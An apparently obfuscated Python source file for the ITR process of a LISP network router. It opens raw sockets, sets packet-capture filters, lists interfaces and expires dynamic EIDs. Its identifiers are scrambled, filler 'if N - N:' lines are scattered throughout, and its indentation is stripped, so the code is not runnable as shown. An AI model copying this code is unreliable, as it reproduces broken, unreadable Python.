if 13 - 13: Oo0Ooo . i11iIiiIii - iIii1I11I1II1 - OoOoOO00
if 6 - 6: I1IiiI / Oo0Ooo % Ii1I
if 84 - 84: i11iIiiIii . o0oOOo0O0Ooo
if 100 - 100: Ii1I - Ii1I - I1Ii111
if 20 - 20: OoooooooOO
if 13 - 13: i1IIi - Ii1I % oO0o / iIii1I11I1II1 % iII111i
def oo ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "ITR" ) )
if 68 - 68: I11i + OOooOOo . iIii1I11I1II1 - IiII % iIii1I11I1II1 - ooOoO0o
if 79 - 79: Oo0Ooo + I1IiiI - iII111i
if 83 - 83: ooOoO0o
if 64 - 64: OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
def I1i1iii ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_rloc_probe_command ( "ITR" ) )
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
def oo0 ( lisp_sockets , lisp_ephem_port ) :
lisp . lisp_set_exception ( )
if 57 - 57: OOooOOo . OOooOOo
if 95 - 95: O0 + OoO0O00 . II111iiii / O0
if 97 - 97: ooOoO0o - OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - OoooooooOO
if 59 - 59: O0 + I1IiiI + IiII % I1IiiI
for o0OOoo0OO0OOO in lisp . lisp_crypto_keys_by_nonce . values ( ) :
for iI1iI1I1i1I in o0OOoo0OO0OOO : del ( iI1iI1I1i1I )
if 24 - 24: I1ii11iIi11i
lisp . lisp_crypto_keys_by_nonce = { }
if 56 - 56: ooOoO0o
if 92 - 92: iII111i . I11i + o0oOOo0O0Ooo
if 28 - 28: i1IIi * Oo0Ooo - o0oOOo0O0Ooo * IiII * Ii1I / OoO0O00
if 94 - 94: II111iiii % I1ii11iIi11i / OoOoOO00 * iIii1I11I1II1
if 54 - 54: o0oOOo0O0Ooo - I1IiiI + OoooooooOO
if ( lisp . lisp_l2_overlay ) :
O0o0 = lisp . LISP_AFI_MAC
OO00Oo = lisp . lisp_default_iid
O0OOO0OOoO0O = lisp . lisp_address ( O0o0 , "0000-0000-0000" , 0 , OO00Oo )
O0OOO0OOoO0O . mask_len = 0
O00Oo000ooO0 = lisp . lisp_address ( O0o0 , "ffff-ffff-ffff" , 48 , OO00Oo )
lisp . lisp_send_map_request ( lisp_sockets , lisp_ephem_port , O0OOO0OOoO0O , O00Oo000ooO0 , None )
if 100 - 100: O0 + IiII - OOooOOo + i11iIiiIii * Ii1I
if 30 - 30: o0oOOo0O0Ooo . Ii1I - OoooooooOO
if 8 - 8: i1IIi - iIii1I11I1II1 * II111iiii + i11iIiiIii / I1Ii111 % OOooOOo
if 16 - 16: I1ii11iIi11i + OoO0O00 - II111iiii
if 85 - 85: OoOoOO00 + i1IIi
lisp . lisp_timeout_map_cache ( lisp . lisp_map_cache )
if 58 - 58: II111iiii * OOooOOo * I1ii11iIi11i / OOooOOo
if 75 - 75: oO0o
if 50 - 50: Ii1I / Oo0Ooo - oO0o - I11i % iII111i - oO0o
if 91 - 91: OoO0O00 / I11i - II111iiii . I11i
i11 = threading . Timer ( 60 , oo0 ,
[ lisp_sockets , lisp_ephem_port ] )
i11 . start ( )
return
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
def OO0oOoOO0oOO0 ( lisp_socket ) :
lisp . lisp_set_exception ( )
if 86 - 86: OOooOOo
OOoo0O = lisp . lisp_get_timestamp ( )
for Oo0ooOo0o in lisp . lisp_db_list :
if ( Oo0ooOo0o . dynamic_eid_configured ( ) == False ) : continue
if 22 - 22: iIii1I11I1II1 / i11iIiiIii * iIii1I11I1II1 * II111iiii . OOooOOo / i11iIiiIii
Iiii = [ ]
for OO0OoO0o00 in Oo0ooOo0o . dynamic_eids . values ( ) :
ooOO0O0ooOooO = OO0OoO0o00 . last_packet
if ( ooOO0O0ooOooO == None ) : continue
if ( ooOO0O0ooOooO + OO0OoO0o00 . timeout > OOoo0O ) : continue
if 55 - 55: o0oOOo0O0Ooo * OoOoOO00
if 61 - 61: I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
if ( lisp . lisp_program_hardware ) :
IIIIiiII111 = OO0OoO0o00 . dynamic_eid . print_prefix_no_iid ( )
if ( lisp . lisp_arista_is_alive ( IIIIiiII111 ) ) :
lisp . lprint ( ( "Hardware indicates dynamic-EID {} " + "still active" ) . format ( lisp . green ( IIIIiiII111 , False ) ) )
if 97 - 97: I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
continue
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
if 83 - 83: I11i / I1IiiI
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
oOOo0oOo0 = OO0OoO0o00 . dynamic_eid . print_address ( )
II = "learn%{}%None" . format ( oOOo0oOo0 )
II = lisp . lisp_command_ipc ( II , "lisp-itr" )
lisp . lisp_ipc ( II , lisp_socket , "lisp-etr" )
if 60 - 60: I1IiiI
lisp . lprint ( "Dynamic-EID {}" . format ( lisp . bold ( lisp . green ( oOOo0oOo0 , False ) + " activity timeout" ,
# II111iiii . I1IiiI
False ) ) )
Iiii . append ( oOOo0oOo0 )
if 1 - 1: Oo0Ooo / o0oOOo0O0Ooo % iII111i * IiII . i11iIiiIii
if 2 - 2: I1ii11iIi11i * I11i - iIii1I11I1II1 + I1IiiI . oO0o % iII111i
if 92 - 92: iII111i
if 25 - 25: Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
for oOOo0oOo0 in Iiii : Oo0ooOo0o . dynamic_eids . pop ( oOOo0oOo0 )
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if 51 - 51: O0 + iII111i
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
threading . Timer ( lisp . LISP_DEFAULT_DYN_EID_TIMEOUT ,
OO0oOoOO0oOO0 , [ lisp_socket ] ) . start ( )
return
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
if 77 - 77: iIii1I11I1II1 * OoO0O00
def oOooOo0 ( ) :
if ( lisp . lisp_is_macos ( ) ) : return ( [ "en0" , "en1" , "lo0" ] )
if 38 - 38: I1Ii111
if 84 - 84: iIii1I11I1II1 % iII111i / iIii1I11I1II1 % I11i
if 45 - 45: O0
if 26 - 26: I11i - iIii1I11I1II1 - I1IiiI / OoO0O00 . OoOoOO00 % iIii1I11I1II1
OO = "Link encap"
iIiIIi1 = commands . getoutput ( "ifconfig | egrep '{}'" . format ( OO ) )
if ( iIiIIi1 == "" ) :
OO = ": flags="
iIiIIi1 = commands . getoutput ( "ifconfig | egrep '{}'" . format ( OO ) )
if 7 - 7: ooOoO0o - Oo0Ooo - oO0o + ooOoO0o
if 26 - 26: Ii1I
iIiIIi1 = iIiIIi1 . split ( "\n" )
if 35 - 35: Ii1I - I1IiiI % o0oOOo0O0Ooo . OoooooooOO % Ii1I
I1i1Iiiii = [ ]
for OOo0oO00ooO00 in iIiIIi1 :
oOO0O00oO0Ooo = OOo0oO00ooO00 . split ( OO ) [ 0 ] . replace ( " " , "" )
I1i1Iiiii . append ( oOO0O00oO0Ooo )
if 67 - 67: OoO0O00 - OOooOOo
return ( I1i1Iiiii )
if 36 - 36: IiII
if 36 - 36: ooOoO0o / O0 * Oo0Ooo - OOooOOo % iIii1I11I1II1 * oO0o
if 79 - 79: O0
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
if 57 - 57: OoO0O00 / ooOoO0o
if 29 - 29: iIii1I11I1II1 + OoOoOO00 * OoO0O00 * OOooOOo . I1IiiI * I1IiiI
def I111I1Iiii1i ( ) :
global II1iII1i
global oO0oIIII
global Oo0oO0oo0oO00
global i111I
global II1Ii1iI1i
global Ii1IIii11 , Oooo0000
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
lisp . lisp_i_am ( "itr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "ITR starting up" )
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
lisp . lisp_get_local_interfaces ( )
lisp . lisp_get_local_macs ( )
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
if 49 - 49: I1IiiI - I11i
II1iII1i [ 0 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV4 )
II1iII1i [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
oO0oIIII = lisp . lisp_open_listen_socket ( "" , "lisp-itr" )
Oo0oO0oo0oO00 = lisp . lisp_open_listen_socket ( "" , "lispers.net-itr" )
II1iII1i [ 2 ] = oO0oIIII
OoOOoOooooOOo = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
i111I = lisp . lisp_open_listen_socket ( OoOOoOooooOOo ,
str ( iiI1iIiI ) )
if 87 - 87: I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
II1Ii1iI1i = lisp . lisp_open_listen_socket ( "0.0.0.0" ,
str ( OOo ) )
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
Ii1IIii11 = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
Ii1IIii11 . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if ( lisp . lisp_is_raspbian ( ) == False ) :
Oooo0000 = socket . socket ( socket . AF_INET6 , socket . SOCK_RAW ,
socket . IPPROTO_UDP )
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
if 78 - 78: I1ii11iIi11i % oO0o / iII111i - iIii1I11I1II1
if 69 - 69: I1Ii111
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
lisp . lisp_ipc_socket = oO0oIIII
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
threading . Thread ( target = OoOOo0OOoO ) . start ( )
if 72 - 72: Ii1I
if 1 - 1: OoO0O00 * IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
lisp . lisp_load_checkpoint ( )
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
if 26 - 26: Ii1I % I1ii11iIi11i
if 76 - 76: IiII * iII111i
if 52 - 52: OOooOOo
lisp . lisp_load_split_pings = ( os . getenv ( "LISP_LOAD_SPLIT_PINGS" ) != None )
if 19 - 19: I1IiiI
if 25 - 25: Ii1I / ooOoO0o
if 31 - 31: OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
if 71 - 71: I1Ii111 . II111iiii
i11 = threading . Timer ( 60 , oo0 ,
[ II1iII1i , iiI1iIiI ] )
i11 . start ( )
if 62 - 62: OoooooooOO . I11i
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
threading . Timer ( lisp . LISP_DEFAULT_DYN_EID_TIMEOUT ,
OO0oOoOO0oOO0 , [ oO0oIIII ] ) . start ( )
return ( True )
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
def o0ooooO0o0O ( ) :
iiIi11iI1iii = open ( "./lisp.config" , "r" )
if 67 - 67: O0 / I1Ii111
OOO0000oO = False
iI1i111I1Ii = 0
for i11i1ii1I in iiIi11iI1iii :
if ( i11i1ii1I == "lisp database-mapping {\n" ) : OOO0000oO = True
if ( i11i1ii1I == "}\n" ) : OOO0000oO = False
if ( OOO0000oO == False ) : continue
if ( i11i1ii1I [ 0 ] == " " and i11i1ii1I . find ( "prefix {" ) != - 1 ) : iI1i111I1Ii += 1
if 88 - 88: I11i % I1ii11iIi11i
iiIi11iI1iii . close ( )
return ( iI1i111I1Ii )
if 48 - 48: ooOoO0o / I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / i1IIi
if 92 - 92: Oo0Ooo % Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
def O00oOOooo ( ) :
if 50 - 50: I1ii11iIi11i % O0 * o0oOOo0O0Ooo
if 5 - 5: IiII * OoOoOO00
if 5 - 5: I1Ii111
if 90 - 90: I1Ii111 . ooOoO0o / Ii1I - I11i
if 40 - 40: OoooooooOO
iI1i111I1Ii = o0ooooO0o0O ( )
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
if 84 - 84: ooOoO0o % Ii1I + i11iIiiIii
if 28 - 28: Oo0Ooo + OoO0O00 * OOooOOo % oO0o . I11i % O0
if 16 - 16: I11i - iIii1I11I1II1 / I1IiiI . II111iiii + iIii1I11I1II1
if 19 - 19: OoO0O00 - Oo0Ooo . O0
if 60 - 60: II111iiii + Oo0Ooo
I1IiIiiIiIII = os . getenv ( "LISP_ITR_WAIT_TIME" )
I1IiIiiIiIII = 1 if ( I1IiIiiIiIII == None ) else int ( I1IiIiiIiIII )
if 8 - 8: oO0o / I1ii11iIi11i
if 20 - 20: I1IiiI
if 95 - 95: iII111i - I1IiiI
if 34 - 34: ooOoO0o * I1IiiI . i1IIi * ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
while ( iI1i111I1Ii != len ( lisp . lisp_db_list ) ) :
lisp . lprint ( ( "Waiting {} second(s) for {} database-mapping EID-" + "prefixes, {} processed so far ..." ) . format ( I1IiIiiIiIII , iI1i111I1Ii ,
# I1ii11iIi11i % OoOoOO00 * OoO0O00 % II111iiii
len ( lisp . lisp_db_list ) ) )
time . sleep ( I1IiIiiIiIII )
if 70 - 70: OoO0O00 % oO0o + OOooOOo / Ii1I % O0
if 100 - 100: o0oOOo0O0Ooo + OOooOOo * o0oOOo0O0Ooo
if 80 - 80: o0oOOo0O0Ooo * O0 - Ii1I
if 66 - 66: i11iIiiIii - OOooOOo * Oo0Ooo
if 76 - 76: i11iIiiIii + o0oOOo0O0Ooo / I1ii11iIi11i - OoO0O00 - Ii1I + I1ii11iIi11i
if 51 - 51: iIii1I11I1II1 . ooOoO0o + iIii1I11I1II1
oOoOO = [ ]
Ii1i1 = [ ]
for Oo0ooOo0o in lisp . lisp_db_list :
if ( Oo0ooOo0o . eid . is_ipv4 ( ) or Oo0ooOo0o . eid . is_ipv6 ( ) or Oo0ooOo0o . eid . is_mac ( ) ) :
oOOo0oOo0 = Oo0ooOo0o . eid . print_prefix_no_iid ( )
if ( Oo0ooOo0o . dynamic_eid_configured ( ) ) : Ii1i1 . append ( oOOo0oOo0 )
oOoOO . append ( oOOo0oOo0 )
if 65 - 65: ooOoO0o . OoooooooOO / I1ii11iIi11i . i1IIi * OoO0O00
if 19 - 19: i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
return ( oOoOO , Ii1i1 )
if 21 - 21: O0 % IiII . I1IiiI / II111iiii + IiII
if 53 - 53: oO0o - I1IiiI - oO0o * iII111i
if 71 - 71: O0 - iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
def OoOOo0OOoO ( ) :
global i1iIIi1
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
lisp . lisp_set_exception ( )
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
if 46 - 46: o0oOOo0O0Ooo % iIii1I11I1II1 . iII111i % iII111i + i11iIiiIii
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
oOoOO , Ii1i1 = O00oOOooo ( )
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
if 28 - 28: ooOoO0o + i11iIiiIii / I11i % OoOoOO00 % Oo0Ooo - O0
if 54 - 54: i1IIi + II111iiii
if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
if 5 - 5: Ii1I
if 46 - 46: IiII
ii1iIi1iIiI1i = None
if ( lisp . lisp_ipc_data_plane ) :
lisp . lprint ( lisp . bold ( "Data-plane packet capture disabled" , False ) )
ii1iIi1iIiI1i = "(udp src port 4342 and ip[28] == 0x28)" + " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
if 40 - 40: i1IIi % OOooOOo
if 71 - 71: OoOoOO00
lisp . lprint ( "Control-plane capture: '{}'" . format ( ii1iIi1iIiI1i ) )
else :
lisp . lprint ( "Capturing packets for source-EIDs {}" . format ( lisp . green ( str ( oOoOO ) , False ) ) )
if 14 - 14: i11iIiiIii % OOooOOo
if 82 - 82: iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % IiII / Ii1I . Ii1I
if ( lisp . lisp_pitr ) : lisp . lprint ( "Configured for PITR functionality" )
if 14 - 14: o0oOOo0O0Ooo . OOooOOo . I11i + OoooooooOO - OOooOOo + IiII
if 9 - 9: Ii1I
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
if 98 - 98: iIii1I11I1II1 * I1ii11iIi11i * OOooOOo + ooOoO0o % i11iIiiIii % O0
i1 = lisp . lisp_l2_overlay
if ( i1 == False ) :
if ( lisp . lisp_is_linux ( ) ) : OO0oOOoo ( oOoOO , Ii1i1 )
if 52 - 52: o0oOOo0O0Ooo % Oo0Ooo
if 64 - 64: O0 % I11i % O0 * OoO0O00 . oO0o + I1IiiI
if 75 - 75: I11i . OoooooooOO % o0oOOo0O0Ooo * I11i % OoooooooOO
if 13 - 13: IiII / i11iIiiIii % II111iiii % I11i . I1ii11iIi11i
if 8 - 8: OoOoOO00 + Oo0Ooo - II111iiii
if 11 - 11: i1IIi % i11iIiiIii - i1IIi * OoOoOO00
if ( ii1iIi1iIiI1i == None ) :
if ( lisp . lisp_pitr ) :
i1I11IiI1iiII = o00oOo0oOoo ( oOoOO , [ ] , False , True )
else :
i1I11IiI1iiII = o00oOo0oOoo ( oOoOO , Ii1i1 , i1 ,
False )
if 57 - 57: OoOoOO00 - I1ii11iIi11i
else :
i1I11IiI1iiII = ii1iIi1iIiI1i
if 50 - 50: I1Ii111 / i1IIi % OoO0O00 . I1IiiI / iII111i
if 88 - 88: OOooOOo . I11i * o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . I11i
if 10 - 10: o0oOOo0O0Ooo * Oo0Ooo % O0 * iIii1I11I1II1 . O0 % I1ii11iIi11i
if 44 - 44: II111iiii / iII111i / I11i % II111iiii / i1IIi . Ii1I
if 59 - 59: OoooooooOO
iIiIIi1 = oOooOo0 ( )
i1iiiii1 = os . getenv ( "LISP_PCAP_LIST" )
if ( i1iiiii1 == None ) :
O0iII1 = ""
IIII1i = [ ]
else :
Ii1IIIIi1ii1I = list ( set ( i1iiiii1 . split ( ) ) & set ( iIiIIi1 ) )
IIII1i = list ( set ( i1iiiii1 . split ( ) ) ^ set ( iIiIIi1 ) )
O0iII1 = "user-selected "
lisp . lprint ( "User pcap-list: {}, active-interfaces: {}" . format ( i1iiiii1 , iIiIIi1 ) )
if 13 - 13: I1IiiI % OoOoOO00 . I1ii11iIi11i / Oo0Ooo % OOooOOo . OoooooooOO
iIiIIi1 = Ii1IIIIi1ii1I
if 22 - 22: IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
if 100 - 100: ooOoO0o % iIii1I11I1II1 * II111iiii - iII111i
for oo00O00oO000o in iIiIIi1 :
OOo00OoO = [ oo00O00oO000o , i1I11IiI1iiII , i1iIIi1 ]
lisp . lprint ( "Capturing packets on {}interface {}" . format ( O0iII1 , oo00O00oO000o ) )
threading . Thread ( target = iIi1 , args = OOo00OoO ) . start ( )
if 21 - 21: I11i
if ( ii1iIi1iIiI1i ) : return
if 92 - 92: i11iIiiIii / I1Ii111 - iII111i % ooOoO0o * I1Ii111 + Oo0Ooo
if 11 - 11: OoooooooOO . I1Ii111
if 80 - 80: OoooooooOO - OOooOOo * Ii1I * I1ii11iIi11i / I1IiiI / OOooOOo
if 13 - 13: I1Ii111 * ooOoO0o + i11iIiiIii * I1Ii111 - ooOoO0o
if 23 - 23: iIii1I11I1II1 * i1IIi % OoooooooOO * IiII
I1Iiiiiii = "(udp src port 4342 and ip[28] == 0x28)"
for oo00O00oO000o in IIII1i :
OOo00OoO = [ oo00O00oO000o , I1Iiiiiii , i1iIIi1 ]
lisp . lprint ( "Capture RLOC-probe replies on RLOC interface {}" . format ( oo00O00oO000o ) )
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
threading . Thread ( target = iIi1 , args = OOo00OoO ) . start ( )
if 69 - 69: O0
return
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
if 73 - 73: i1IIi / i11iIiiIii
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
if 85 - 85: OoOoOO00 + OOooOOo
def I1II ( ) :
if 27 - 27: II111iiii / Ii1I . OOooOOo
if 9 - 9: ooOoO0o - I1ii11iIi11i - iII111i
if 82 - 82: IiII - IiII + OoOoOO00
if 8 - 8: o0oOOo0O0Ooo % iII111i * oO0o % Ii1I . ooOoO0o / ooOoO0o
if ( I11 ) : I11 . cancel ( )
if 81 - 81: OoO0O00
if 99 - 99: oO0o * II111iiii * I1Ii111
if 92 - 92: Oo0Ooo
if 40 - 40: OoOoOO00 / IiII
lisp . lisp_close_socket ( II1iII1i [ 0 ] , "" )
lisp . lisp_close_socket ( II1iII1i [ 1 ] , "" )
lisp . lisp_close_socket ( i111I , "" )
lisp . lisp_close_socket ( II1Ii1iI1i , "" )
lisp . lisp_close_socket ( oO0oIIII , "lisp-itr" )
lisp . lisp_close_socket ( Oo0oO0oo0oO00 , "lispers.net-itr" )
return
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
if 61 - 61: II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
if 90 - 90: iII111i
if 31 - 31: OOooOOo + O0
if 87 - 87: ooOoO0o
def IIIii ( packet , device , input_interface , macs , my_sa ) :
global II1iII1i
global iiI1iIiI
global Ii1IIii11 , Oooo0000
global oO0oIIII
if 83 - 83: IiII % o0oOOo0O0Ooo % I1IiiI . iIii1I11I1II1 - IiII
if 88 - 88: OoooooooOO
if 84 - 84: OoOoOO00 / I11i * iII111i / oO0o - i11iIiiIii . Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
I1iIiI11I1 = packet
packet , i1oOOoo0o0OOOO , i1IiII1III , i1O00oo = lisp . lisp_is_rloc_probe ( packet , 1 )
if ( I1iIiI11I1 != packet ) :
if ( i1oOOoo0o0OOOO == None ) : return
lisp . lisp_parse_packet ( II1iII1i , packet , i1oOOoo0o0OOOO , i1IiII1III , i1O00oo )
return
if 77 - 77: iII111i % OOooOOo - I11i % ooOoO0o - OoO0O00 / Oo0Ooo
if 4 - 4: OoooooooOO - i1IIi % Ii1I - OOooOOo * o0oOOo0O0Ooo
packet = lisp . lisp_packet ( packet )
if ( packet . decode ( False , None , None ) == None ) : return
if 85 - 85: OoooooooOO * iIii1I11I1II1 . iII111i / OoooooooOO % I1IiiI % O0
if 36 - 36: Ii1I / II111iiii / IiII / IiII + I1ii11iIi11i
if 95 - 95: IiII
if 51 - 51: II111iiii + IiII . i1IIi . I1ii11iIi11i + OoOoOO00 * I1IiiI
if 72 - 72: oO0o + oO0o / II111iiii . OoooooooOO % Ii1I
if 49 - 49: oO0o . OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
if ( my_sa ) : input_interface = device
if 2 - 2: OoooooooOO % OOooOOo
if 63 - 63: I1IiiI % iIii1I11I1II1
if 39 - 39: iII111i / II111iiii / I1ii11iIi11i % I1IiiI
if 89 - 89: I1Ii111 + OoooooooOO + I1Ii111 * i1IIi + iIii1I11I1II1 % I11i
oOo0oO = packet . inner_source
